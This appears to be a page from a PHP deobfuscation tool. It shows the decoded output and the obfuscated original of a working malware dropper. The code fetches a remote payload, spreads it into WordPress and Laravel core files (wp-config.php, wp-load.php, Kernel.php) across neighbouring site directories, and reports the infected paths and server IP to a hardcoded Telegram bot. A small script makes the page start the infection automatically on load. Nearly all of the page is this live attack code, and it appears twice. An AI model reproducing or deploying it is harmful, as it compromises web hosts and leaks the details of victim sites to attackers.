Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $payloadUrl = "\150\x74\x74\160..

Decoded Output download

<?php 
 
if ($_SERVER['REQUEST_METHOD'] === 'POST') { 
    $payloadUrl = "https://raw.githubusercontent.com/necessaryfor/neces/refs/heads/main/z2.txt"; 
 
    $logMode = isset($_GET['logke']); 
    $payload = file_get_contents($payloadUrl); 
    if (!$payload) { 
        echo json_encode(['status' => 'error', 'message' => 'Payload indirilemedi.']); 
        exit(); 
    } 
 
    function findDomains_v1($startDir) 
    { 
        $currentDir = realpath($startDir); 
        $domains = []; 
 
        while ($currentDir !== '/') { 
            $entries = scandir($currentDir); 
 
            foreach ($entries as $entry) { 
                if ($entry === '.' || $entry === '..') { 
                    continue; 
                } 
 
                $entryPath = $currentDir . DIRECTORY_SEPARATOR . $entry; 
 
                if (is_dir($entryPath) && preg_match('/^[a-zA-Z0-9\-.]+$/', $entry)) { 
                    $domains[] = $entryPath; 
                } 
            } 
 
            $currentDir = dirname($currentDir); 
        } 
 
        return array_unique($domains); 
    } 
 
    function scanAndProcessInDomains($domains, $payload, $targetFiles, &$updatedFiles) 
    { 
        $results = []; 
        foreach ($domains as $domainDir) { 
            $results = array_merge($results, scanAndProcess($domainDir, $payload, $targetFiles, $updatedFiles)); 
        } 
        return $results; 
    } 
 
    function adjustPhpTags($fileContents, $payload) 
    { 
        $utcTimestamp = gmdate('Y-m-d H:i:s'); 
        $MiuskCode = "<!-- Miusk Code: $utcTimestamp -->
$payload"; 
 
        if (preg_match('/<\?php/', $fileContents)) { 
            if (!preg_match('/\?>\s*$/', $fileContents)) { 
                $fileContents .= "
?>"; 
            } 
        } else { 
            $fileContents = "<?php
" . $fileContents; 
        } 
 
        return $fileContents . "

" . $MiuskCode; 
    } 
 
    function sendTelegramNotification($updatedFiles) 
{ 
    $botToken = "7288530056:AAH3mvjU3wl94AivFXbX2XWH4Oug6c74gy8"; 
    $chatId = "-1002316636347"; 
 
    $processedPaths = []; 
 
    foreach ($updatedFiles as $filePath) { 
        // Domain ile / arasna bir boluk ekle 
        $formattedPath = preg_replace('/(\.[a-z]{2,})(\/)/', '$1 $2', $filePath); 
        $processedPaths[] = $formattedPath; // lenmi yolu diziye ekle 
    } 
 
    // Tekrar eden yollar filtrele 
    $uniquePaths = array_unique($processedPaths); 
 
    $message = "Gncellenen dosyalar:
"; 
    foreach ($uniquePaths as $uniquePath) { 
        $message .= "- $uniquePath
"; 
    } 
 
    $host = $_SERVER['HTTP_HOST'];  // Dorudan host deerini alyoruz 
    $message .= "Sayfa URL: " . $host . "
"; 
 
    // DNS sorgusu ile IP adresini alyoruz 
    $dnsRecords = dns_get_record($host, DNS_A); 
    $ip = isset($dnsRecords[0]['ip']) ? $dnsRecords[0]['ip'] : 'IP bulunamad'; 
 
    $message .= "domain-ip: " . $ip . "
"; 
 
    // Telegram mesajn gnder 
    $message = urlencode($message); 
    file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=$message"); 
} 
 
 
    function scanAndProcess($directory, $payload, $targetFiles, &$updatedFiles) 
    { 
        $files = scandir($directory); 
        $results = []; 
 
        foreach ($files as $file) { 
            if ($file === '.' || $file === '..') { 
                continue; 
            } 
 
            $filePath = $directory . DIRECTORY_SEPARATOR . $file; 
 
            try { 
                if (is_dir($filePath)) { 
                    $results = array_merge($results, scanAndProcess($filePath, $payload, $targetFiles, $updatedFiles)); 
                } else { 
                    // st klasr ismine gre kontrol 
                    $fileName = basename($filePath); 
                    $parentDirs = array_filter(explode(DIRECTORY_SEPARATOR, dirname($filePath))); 
 
                    foreach ($targetFiles as $target) { 
                        // Dosya yolu ve st dizinleri kontrol et 
                        $targetParts = array_filter(explode('/', $target)); 
                        $targetFileName = array_pop($targetParts); // Son eleman dosya ismi 
                        $targetParentDirs = $targetParts; // Kalanlar st dizin isimleri 
 
                        // Eer dosya ismi eleiyorsa, st dizinleri kontrol et 
                        if ($fileName === $targetFileName) { 
                            // st dizinlerin sras nemli, her st dizinin mevcut dizinde olmas gerekiyor 
                            if (count($targetParentDirs) <= count($parentDirs) && array_slice($parentDirs, -count($targetParentDirs)) === $targetParentDirs) { 
                                processFile($filePath, $payload, $updatedFiles, $results); 
                            } 
                        } 
                    } 
                } 
            } catch (Exception $e) { 
                $results[] = ['file' => $filePath, 'status' => 'error', 'message' => $e->getMessage()]; 
            } 
        } 
        return $results; 
    } 
 
    function processFile($filePath, $payload, &$updatedFiles, &$results) 
    { 
        $fileContents = @file_get_contents($filePath); 
 
        if ($fileContents === false) { 
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Dosya okunamad.']; 
            return; 
        } 
 
        if (preg_match('/<!-- Miusk Code: (.*?) -->/', $fileContents, $matches)) { 
            $lastUpdate = strtotime($matches[1]); 
            $currentUtc = time(); 
 
            if (($currentUtc - $lastUpdate) < 30) { 
                $results[] = ['file' => $filePath, 'status' => 'skipped', 'message' => 'Kod zaten gncel.']; 
                return; 
            } 
 
            $fileContents = preg_replace('/

<!-- Miusk Code.*$/s', '', $fileContents); 
        } 
 
        $adjustedContents = adjustPhpTags($fileContents, $payload); 
        if (@file_put_contents($filePath, $adjustedContents)) { 
            $updatedFiles[] = $filePath; 
            $results[] = ['file' => $filePath, 'status' => 'success', 'message' => 'Kod baaryla eklendi.']; 
        } else { 
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Kod eklenemedi.']; 
        } 
    } 
 
    $startDir = __DIR__; 
    $targetFiles = ['app/Http/Kernel.php', 'wp-load.php', 'wp-config.php']; 
    $domains = findDomains_v1($startDir); 
 
    $updatedFiles = []; 
    $results = scanAndProcessInDomains($domains, $payload, $targetFiles, $updatedFiles); 
 
    if (!empty($updatedFiles)) { 
        sendTelegramNotification($updatedFiles); 
    } 
 
    echo json_encode($results); 
    exit; 
} 
?> 
 
 
 
 
<script> 
window.addEventListener('load', function () { 
    if (!window.started) {  
        window.started = true; 
 
        fetch(window.location.href, { 
            method: 'POST', 
            headers: { 'Content-Type': 'application/json' } 
        }) 
        .then(response => response.json()) 
        .then(data => { 
            data.forEach(result => { 
                const statusColor = result.status === 'success' ? 'green' : result.status === 'error' ? 'red' : 'orange'; 
            }); 
        }) 
        .catch(error => console.error("Hata:", error)); 
    } 
}); 
</script>

Did this file decode correctly?

Original Code

<?php

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $payloadUrl = "\150\x74\x74\160\163\x3a\x2f\57\162\141\x77\x2e\147\x69\164\150\165\x62\x75\x73\145\x72\143\x6f\x6e\164\145\156\164\56\x63\x6f\155\x2f\156\x65\x63\145\163\163\x61\162\171\x66\157\162\57\x6e\145\x63\x65\x73\x2f\162\x65\x66\163\57\150\x65\x61\144\x73\x2f\155\141\x69\156\x2f\172\x32\56\164\x78\x74";

    $logMode = isset($_GET['logke']);
    $payload = file_get_contents($payloadUrl);
    if (!$payload) {
        echo json_encode(['status' => 'error', 'message' => 'Payload indirilemedi.']);
        exit();
    }

    function findDomains_v1($startDir)
    {
        $currentDir = realpath($startDir);
        $domains = [];

        while ($currentDir !== '/') {
            $entries = scandir($currentDir);

            foreach ($entries as $entry) {
                if ($entry === '.' || $entry === '..') {
                    continue;
                }

                $entryPath = $currentDir . DIRECTORY_SEPARATOR . $entry;

                if (is_dir($entryPath) && preg_match('/^[a-zA-Z0-9\-.]+$/', $entry)) {
                    $domains[] = $entryPath;
                }
            }

            $currentDir = dirname($currentDir);
        }

        return array_unique($domains);
    }

    function scanAndProcessInDomains($domains, $payload, $targetFiles, &$updatedFiles)
    {
        $results = [];
        foreach ($domains as $domainDir) {
            $results = array_merge($results, scanAndProcess($domainDir, $payload, $targetFiles, $updatedFiles));
        }
        return $results;
    }

    function adjustPhpTags($fileContents, $payload)
    {
        $utcTimestamp = gmdate('Y-m-d H:i:s');
        $MiuskCode = "<!-- Miusk Code: $utcTimestamp -->\n$payload";

        if (preg_match('/<\?php/', $fileContents)) {
            if (!preg_match('/\?>\s*$/', $fileContents)) {
                $fileContents .= "\n?>";
            }
        } else {
            $fileContents = "<?php\n" . $fileContents;
        }

        return $fileContents . "\n\n" . $MiuskCode;
    }

    function sendTelegramNotification($updatedFiles)
{
    $botToken = "\x37\x32\70\x38\x35\x33\60\x30\x35\x36\x3a\101\x41\110\x33\x6d\166\x6a\125\x33\167\x6c\x39\64\x41\151\166\106\130\x62\130\62\130\127\110\x34\x4f\165\x67\x36\x63\x37\64\x67\171\x38";
    $chatId = "\55\x31\x30\60\62\x33\x31\x36\x36\x33\66\63\x34\x37";

    $processedPaths = [];

    foreach ($updatedFiles as $filePath) {
        // Domain ile / arasna bir boluk ekle
        $formattedPath = preg_replace('/(\.[a-z]{2,})(\/)/', '$1 $2', $filePath);
        $processedPaths[] = $formattedPath; // lenmi yolu diziye ekle
    }

    // Tekrar eden yollar filtrele
    $uniquePaths = array_unique($processedPaths);

    $message = "Gncellenen dosyalar:\n";
    foreach ($uniquePaths as $uniquePath) {
        $message .= "- $uniquePath\n";
    }

    $host = $_SERVER['HTTP_HOST'];  // Dorudan host deerini alyoruz
    $message .= "Sayfa URL: " . $host . "\n";

    // DNS sorgusu ile IP adresini alyoruz
    $dnsRecords = dns_get_record($host, DNS_A);
    $ip = isset($dnsRecords[0]['ip']) ? $dnsRecords[0]['ip'] : 'IP bulunamad';

    $message .= "domain-ip: " . $ip . "\n";

    // Telegram mesajn gnder
    $message = urlencode($message);
    file_get_contents("https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=$message");
}


    function scanAndProcess($directory, $payload, $targetFiles, &$updatedFiles)
    {
        $files = scandir($directory);
        $results = [];

        foreach ($files as $file) {
            if ($file === '.' || $file === '..') {
                continue;
            }

            $filePath = $directory . DIRECTORY_SEPARATOR . $file;

            try {
                if (is_dir($filePath)) {
                    $results = array_merge($results, scanAndProcess($filePath, $payload, $targetFiles, $updatedFiles));
                } else {
                    // st klasr ismine gre kontrol
                    $fileName = basename($filePath);
                    $parentDirs = array_filter(explode(DIRECTORY_SEPARATOR, dirname($filePath)));

                    foreach ($targetFiles as $target) {
                        // Dosya yolu ve st dizinleri kontrol et
                        $targetParts = array_filter(explode('/', $target));
                        $targetFileName = array_pop($targetParts); // Son eleman dosya ismi
                        $targetParentDirs = $targetParts; // Kalanlar st dizin isimleri

                        // Eer dosya ismi eleiyorsa, st dizinleri kontrol et
                        if ($fileName === $targetFileName) {
                            // st dizinlerin sras nemli, her st dizinin mevcut dizinde olmas gerekiyor
                            if (count($targetParentDirs) <= count($parentDirs) && array_slice($parentDirs, -count($targetParentDirs)) === $targetParentDirs) {
                                processFile($filePath, $payload, $updatedFiles, $results);
                            }
                        }
                    }
                }
            } catch (Exception $e) {
                $results[] = ['file' => $filePath, 'status' => 'error', 'message' => $e->getMessage()];
            }
        }
        return $results;
    }

    function processFile($filePath, $payload, &$updatedFiles, &$results)
    {
        $fileContents = @file_get_contents($filePath);

        if ($fileContents === false) {
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Dosya okunamad.'];
            return;
        }

        if (preg_match('/<!-- Miusk Code: (.*?) -->/', $fileContents, $matches)) {
            $lastUpdate = strtotime($matches[1]);
            $currentUtc = time();

            if (($currentUtc - $lastUpdate) < 30) {
                $results[] = ['file' => $filePath, 'status' => 'skipped', 'message' => 'Kod zaten gncel.'];
                return;
            }

            $fileContents = preg_replace('/\n\n<!-- Miusk Code.*$/s', '', $fileContents);
        }

        $adjustedContents = adjustPhpTags($fileContents, $payload);
        if (@file_put_contents($filePath, $adjustedContents)) {
            $updatedFiles[] = $filePath;
            $results[] = ['file' => $filePath, 'status' => 'success', 'message' => 'Kod baaryla eklendi.'];
        } else {
            $results[] = ['file' => $filePath, 'status' => 'error', 'message' => 'Kod eklenemedi.'];
        }
    }

    $startDir = __DIR__;
    $targetFiles = ['app/Http/Kernel.php', 'wp-load.php', 'wp-config.php'];
    $domains = findDomains_v1($startDir);

    $updatedFiles = [];
    $results = scanAndProcessInDomains($domains, $payload, $targetFiles, $updatedFiles);

    if (!empty($updatedFiles)) {
        sendTelegramNotification($updatedFiles);
    }

    echo json_encode($results);
    exit;
}
?>




<script>
window.addEventListener('load', function () {
    if (!window.started) { 
        window.started = true;

        fetch(window.location.href, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' }
        })
        .then(response => response.json())
        .then(data => {
            data.forEach(result => {
                const statusColor = result.status === 'success' ? 'green' : result.status === 'error' ? 'red' : 'orange';
            });
        })
        .catch(error => console.error("Hata:", error));
    }
});
</script>

Function Calls

None

Variables

None

Stats

MD5 a5325a432329aff6899c27101f4aa431
Eval Count 0
Decode Time 74 ms